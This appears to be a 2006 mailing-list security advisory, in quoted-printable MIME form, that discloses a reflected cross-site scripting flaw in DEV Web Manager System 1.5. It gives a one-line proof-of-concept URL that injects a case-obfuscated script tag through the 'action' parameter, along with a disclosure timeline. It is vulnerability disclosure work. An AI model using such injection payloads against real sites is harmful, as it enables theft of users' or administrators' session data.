{x0n3-h4ck} DEV Web Manager System <=3D 1.5 XSS = Exploit

This is a multi-part message in MIME format. ------_=_NextPart_001_01C6F219.260F14A2 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -=3D[--------------------ADVISORY-------------------]=3D- -=3D[ = ]=3D- -=3D[ DEV Web Manager System <=3D 1.5 ]=3D- -=3D[ = ]=3D- -=3D[ Author: CorryL [corryl80@gmail.com] ]=3D- -=3D[ www.x0n3-h4ck.org ]=3D- -=3D[----------------------------------------------------]=3D- -=3D[+] Application: DEV Web Manager System -=3D[+] Version: 1.5 -=3D[+] Vendor's URL: http://dev-wms.sourceforge.net/ -=3D[+] Platform: Windows\Linux\Unix -=3D[+] Bug type: cross-site script [XSS] -=3D[+] Exploitation: Remote -=3D[-] -=3D[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=3D[+] Reference: www.x0n3-h4ck.org ..::[ Descriprion ]::.. DEV web manager system one application web based on php ..::[ Bug ]::.. this system e' affect from a bug of type XSS=20 a attaker to use the bug in order to steal sensitive information=20 to the users or admin ..::[ Proof Of Concept ]::.. http://web = site/index.php?session=3D0&action=3D>">alert(775195196)%= 3B ..::[ Workaround ]::.. Nothing ..::[ Disclousure Timeline ]::.. [07/10/2006] - Vendor notification [11/10/2006] - Vendor Response [17/10/2006] - No patch relase from vendor [17/10/2006] - Public disclousure ********************* Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB! Per maggiori informazioni vai su: = http://adsl.alice.it/servizi/alicebasic.html=20 ------_=_NextPart_001_01C6F219.260F14A2 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable {x0n3-h4ck} DEV Web Manager System <=3D 1.5 XSS = Exploit

-=3D[--------------------ADVISORY-------------------]=3D-
-=3D[           &n= bsp;           &nb= sp;           &nbs= p;            = ;            =          ]=3D-
-=3D[        DEV Web Manager System = <=3D 1.5          = ]=3D-
-=3D[           &n= bsp;           &nb= sp;           &nbs= p;            = ;            =          ]=3D-
-=3D[     Author: CorryL = [corryl80@gmail.com]      ]=3D-
-=3D[           &n= bsp;           &nb= sp;     = www.x0n3-h4ck.org         = ]=3D-
-=3D[----------------------------------------------------]=3D-

-=3D[+] Application:    DEV Web Manager System
-=3D[+] Version:        1.5
-=3D[+] Vendor's URL:   http://dev-wms.sourceforge.net/<= /A>
-=3D[+] Platform:       = Windows\Linux\Unix
-=3D[+] Bug type:       cross-site script = [XSS]
-=3D[+] Exploitation:   Remote
-=3D[-]
-=3D[+] Author:         = CorryL ~ corryl80[at]gmail[dot]com ~
-=3D[+] Reference:      www.x0n3-h4ck.org

..::[ Descriprion ]::..

DEV web manager system one application web based on php

..::[ Bug ]::..

this system e' affect from a bug of type XSS
a attaker to use the bug in order to steal sensitive information
to the users or admin

..::[ Proof Of Concept ]::..

http://web = site/index.php?session=3D0&action=3D>"><ScRiPt%20%0a%0d= >alert(775195196)%3B</ScRiPt>

..::[ Workaround ]::..

Nothing

..::[ Disclousure Timeline ]::..

[07/10/2006] - Vendor notification
[11/10/2006] - Vendor Response
[17/10/2006] - No patch relase from vendor
[17/10/2006] - Public disclousure

*********************
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!
Per maggiori informazioni vai su: http://adsl.alice.i= t/servizi/alicebasic.html

------_=_NextPart_001_01C6F219.260F14A2--